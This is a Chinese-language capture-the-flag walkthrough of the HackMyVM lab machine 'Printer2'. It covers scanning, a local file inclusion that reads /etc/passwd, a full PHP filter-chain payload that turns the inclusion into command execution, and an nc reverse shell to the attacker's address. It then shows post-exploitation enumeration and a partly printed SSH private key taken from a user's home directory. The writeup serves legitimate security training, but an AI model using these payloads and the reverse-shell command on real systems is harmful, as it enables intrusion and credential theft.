文章

Printer2

Printer2

image-20240427161735717

image-20240428165920566

信息扫描

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali💀kali)-[~/temp/printer2]
└─$ rustscan -a 192.168.0.181 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.181:22
Open 192.168.0.181:80
Open 192.168.0.181:631

PORT    STATE SERVICE REASON  VERSION
22/tcp  open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV/Sx5gw/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+/5R0D/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9/d6o2oWdMM=
|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=
|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS
80/tcp  open  http    syn-ack Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: Free Website Templates
631/tcp open  ipp     syn-ack CUPS 2.3
|_http-server-header: CUPS/2.3 IPP/2.1
| http-robots.txt: 1 disallowed entry 
|_/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - CUPS 2.3.3op2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali💀kali)-[~/temp/printer2]
└─$ gobuster dir -u http://192.168.0.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.181/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,jpg,txt,html,php,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 315] [--> http://192.168.0.181/images/]
/.html                (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

image-20240428170133972

随手搜一下漏洞,但是没找到,看一下包:

image-20240428170448447

存在dns解析:

192.168.0.181   printer4life.printer.hmv

尝试探测一下子目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali💀kali)-[~/temp/printer2]
└─$ gobuster dir -u http://printer4life.printer.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://printer4life.printer.hmv/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,jpg,txt,html,php,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 289]
/.html                (Status: 403) [Size: 289]
/index.php            (Status: 200) [Size: 365]
/logo                 (Status: 200) [Size: 77750]
/logo.jpg             (Status: 200) [Size: 77750]
/hp.php               (Status: 200) [Size: 27]
/hp.jpg               (Status: 200) [Size: 33673]
/hp                   (Status: 200) [Size: 33673]
/canon                (Status: 200) [Size: 101939]
/canon.jpg            (Status: 200) [Size: 101939]
/canon.php            (Status: 200) [Size: 30]
/epson.jpg            (Status: 200) [Size: 64020]
/epson                (Status: 200) [Size: 64020]
/epson.php            (Status: 200) [Size: 30]
/.php                 (Status: 403) [Size: 289]
/.html                (Status: 403) [Size: 289]
/server-status        (Status: 403) [Size: 289]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

LFI

再看看有啥:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/<!DOCTYPE html>
<html>
<head>
    <title>Printers</title>
</head>
<body>
    <h1>Select a printer</h1>
    <p>I love printers so much ! I print every minute</p>
    <ul>
        <li><a href="index.php?page=hp">HP</a></li>
        <li><a href="index.php?page=canon">Canon</a></li>
        <li><a href="index.php?page=epson">Epson</a></li>
    </ul>
</body>
</html>

发现疑似存在LFI漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/index.php?page=../../../../../etc/passwd
<!DOCTYPE html>
<html>
<head>
    <title>Printers</title>
</head>
<body>
    <h1>Select a printer</h1>
    <p>I love printers so much ! I print every minute</p>
    <ul>
        <li><a href="index.php?page=hp">HP</a></li>
        <li><a href="index.php?page=canon">Canon</a></li>
        <li><a href="index.php?page=epson">Epson</a></li>
    </ul>
</body>
</html>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
avahi:x:107:115:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:117::/var/lib/saned:/usr/sbin/nologin
colord:x:109:118:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
salt:x:110:119::/var/lib/salt:/bin/sh
_rpc:x:111:65534::/run/rpcbind:/usr/sbin/nologin
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash

不错!!!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[/home/kali/temp/printer2]
└─# curl http://printer4life.printer.hmv/index.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
<!DOCTYPE html>
<html>
<head>
    <title>Printers</title>
</head>
<body>
    <h1>Select a printer</h1>
    <p>I love printers so much ! I print every minute</p>
    <ul>
        <li><a href="index.php?page=hp">HP</a></li>
        <li><a href="index.php?page=canon">Canon</a></li>
        <li><a href="index.php?page=epson">Epson</a></li>
    </ul>
</body>
</html>

cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTA0OjExMDpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTA1OjExMzpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4Kc3NoZDp4OjEwNjo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgptYWJlbGxlOng6MTAwMDoxMDAwOiwsLDovaG9tZS9tYWJlbGxlOi9iaW4vYmFzaAphdmFoaTp4OjEwNzoxMTU6QXZhaGkgbUROUyBkYWVtb24sLCw6L3J1bi9hdmFoaS1kYWVtb246L3Vzci9zYmluL25vbG9naW4Kc2FuZWQ6eDoxMDg6MTE3OjovdmFyL2xpYi9zYW5lZDovdXNyL3NiaW4vbm9sb2dpbgpjb2xvcmQ6eDoxMDk6MTE4OmNvbG9yZCBjb2xvdXIgbWFuYWdlbWVudCBkYWVtb24sLCw6L3Zhci9saWIvY29sb3JkOi91c3Ivc2Jpbi9ub2xvZ2luCnNhbHQ6eDoxMTA6MTE5OjovdmFyL2xpYi9zYWx0Oi9iaW4vc2gKX3JwYzp4OjExMTo2NTUzNDo6L3J1bi9ycGNiaW5kOi91c3Ivc2Jpbi9ub2xvZ2luCmtpZXJyYTp4OjEwMDE6MTAwMjosLCw6L2hvbWUva2llcnJhOi9iaW4vYmFzaAo=

发现可以使用伪协议进行读写,尝试构造php链进行命令执行!

1
2
3
python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

尝试反弹shell!!!!

1
http://printer4life.printer.hmv/index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami

image-20240428171727985

成功执行命令,反弹一下shell!!!!

1
http://printer4life.printer.hmv/index.php?page=payload&0=nc+-e+/bin/bash+192.168.0.143+1234

image-20240428171915669

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
(remote) www-data@printer.hmv:/var/www/printer4life$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for www-data: 
sudo: a password is required
(remote) www-data@printer.hmv:/var/www/printer4life$ cat /etc/passwd | grep "bash"
root:x:0:0:root:/root:/bin/bash
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash
(remote) www-data@printer.hmv:/var/www/printer4life$ cd /home
(remote) www-data@printer.hmv:/home$ ls
kierra  mabelle
(remote) www-data@printer.hmv:/home$ cd kierra/
(remote) www-data@printer.hmv:/home/kierra$ ls -la
total 24
drwxr-xr-x 2 kierra kierra 4096 Apr 22  2023 .
drwxr-xr-x 4 root   root   4096 Apr 22  2023 ..
lrwxrwxrwx 1 root   root      9 Apr 22  2023 .bash_history -> /dev/null
-rw-r--r-- 1 kierra kierra  220 Apr 22  2023 .bash_logout
-rw-r--r-- 1 kierra kierra 3526 Apr 22  2023 .bashrc
-rw-r--r-- 1 kierra kierra  807 Apr 22  2023 .profile
-rwx------ 1 kierra kierra   33 Apr 22  2023 user.txt
(remote) www-data@printer.hmv:/home/kierra$ cat user.txt 
cat: user.txt: Permission denied
(remote) www-data@printer.hmv:/home/kierra$ cd ../mabelle/
(remote) www-data@printer.hmv:/home/mabelle$ ls -la
total 32
drwxr-xr-x 4 mabelle mabelle 4096 May 20  2023 .
drwxr-xr-x 4 root    root    4096 Apr 22  2023 ..
lrwxrwxrwx 1 root    root       9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r-- 1 mabelle mabelle  220 Apr 14  2023 .bash_logout
-rw-r--r-- 1 mabelle mabelle 3526 Apr 14  2023 .bashrc
drwxr-xr-x 3 mabelle mabelle 4096 May 20  2023 .local
-rw-r--r-- 1 mabelle mabelle  807 Apr 14  2023 .profile
drwx------ 2 mabelle mabelle 4096 Apr 22  2023 .ssh
-rw-r--r-- 1 mabelle mabelle 2602 Apr 22  2023 mabelle_private_ssh_key
(remote) www-data@printer.hmv:/home/mabelle$ cat mabelle_private_ssh_key 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAsMI4Mddj7c6DmNM3BjMN2wlxX4VArJvNMpnR1ajE+cmrVQueoRDj
xUaEnFZbJrlWHJbDFHCr/dusXroIkqYbyq0NgOK4lQcWjKC/kg6E3OBumzdfmnyiwsF/58
cMc70pG2frbQu6q29pKqyihtAtDV6xq827uMDuJve+ohUs8akybrf9dunLr2iabxRT4CF1
7NfQCY4S2iQvHgF3pKgDXoS7w+q4s60dd0Ka76MvsxUGFULOMp4QUL0SMMC1NEUuWhYMqC
lSGX0NwwTmr1INDFaNOROoPitfSi06E/ckTC6xd3Se8xxLhWV4JtCo1b5Rv4riE2JhBtS/
SqhDEXixbML3l6eK5jZOxNnIAD9863ZXHLSx9hN8v/yzlXJHYyjji37Te4yX73O+5iZE1V
/SeZlQ1Gf56+JZWqQSaLd48lI23ajJX3RIwXkOMJOg93cF6u8h9RQlrFtBqSy5UaAYe9OF
3BNFvlnaDIEC7RXkmagSKBaRDjOdMNoGw7D4I3hlAAAFiOlYdG7pWHRuAAAAB3NzaC1yc2
EAAAGBALDCODHXY+3Og5jTNwYzDdsJcV+FQKybzTKZ0dWoxPnJq1ULnqEQ48VGhJxWWya5
VhyWwxRwq/3brF66CJKmG8qtDYDiuJUHFoygv5IOhNzgbps3X5p8osLBf+fHDHO9KRtn62
0LuqtvaSqsoobQLQ1esavNu7jA7ib3vqIVLPGpMm63/Xbpy69omm8UU+AhdezX0AmOEtok
Lx4Bd6SoA16Eu8PquLOtHXdCmu+jL7MVBhVCzjKeEFC9EjDAtTRFLloWDKgpUhl9DcME5q
9SDQxWjTkTqD4rX0otOhP3JEwusXd0nvMcS4VleCbQqNW+Ub+K4hNiYQbUv0qoQxF4sWzC
95eniuY2TsTZyAA/fOt2Vxy0sfYTfL/8s5VyR2Mo44t+03uMl+9zvuYmRNVf0nmZUNRn+e
viWVqkEmi3ePJSNt2oyV90SMF5DjCToPd3BervIfUUJaxbQaksuVGgGHvThdwTRb5Z2gyB
Au0V5JmoEigWkQ4znTDaBsOw+CN4ZQAAAAMBAAEAAAGAOr4RFt9SInIDYgKvwqus6yJUPz
51o+eTZkGgbrVL4QeYnQbjjPuj9qfc4mgAmvn1GEMySdS4FAGxYznIJ5R0oAKq/i5a0Ywt
fkbd45hXp2Ae4g6hAyJwpPDRpSGNjdlLlAQRRYgkXV0FQl1lFhCRKGRT/5i7zkav3ttuy0
bmTNnCHPGglqhUPNMyn7/NsCrumeuPA93nff+QeRRbwqjjlcHe9NlI0M2zgTLtcr5017sg
7mfpRwEowuxS40jn75sdovPlBDjd9nXggjF5njEtJH3002/Y7ktvXj0zut8IYzDeuaToOD
+7pdjrdwwjnSw+YESyDmGYYiU48vmj8NYmkmO5CR7yN54fa+fWMj+UE2gOaVXXKLSUj9Nv
vgSdihcknccB8QSlpbV9P2fowgL2F66CQmMBpcijjGsqYAnnTlLvDl4rr4mKALGpkBXRdk
ONcfBr4GCN9DCZhw4xK/BNMTM8y89nQo1hEhdFST/2m+JdiekeGEBjsYCS6NFMAWEBAAAA
wFQXd68P2TJtMUBLclBpnCeoJ1KvFSrpo4WMXG2uuSBUiy1x7KzM42atvMf0/OwJstW6C2
khWO9Q0CxeqMuSb4lQ5BhAz3kNNt+kJtgBdinw8M8/1x/FzA18xrvtq2haFOGw8cGF1U3u
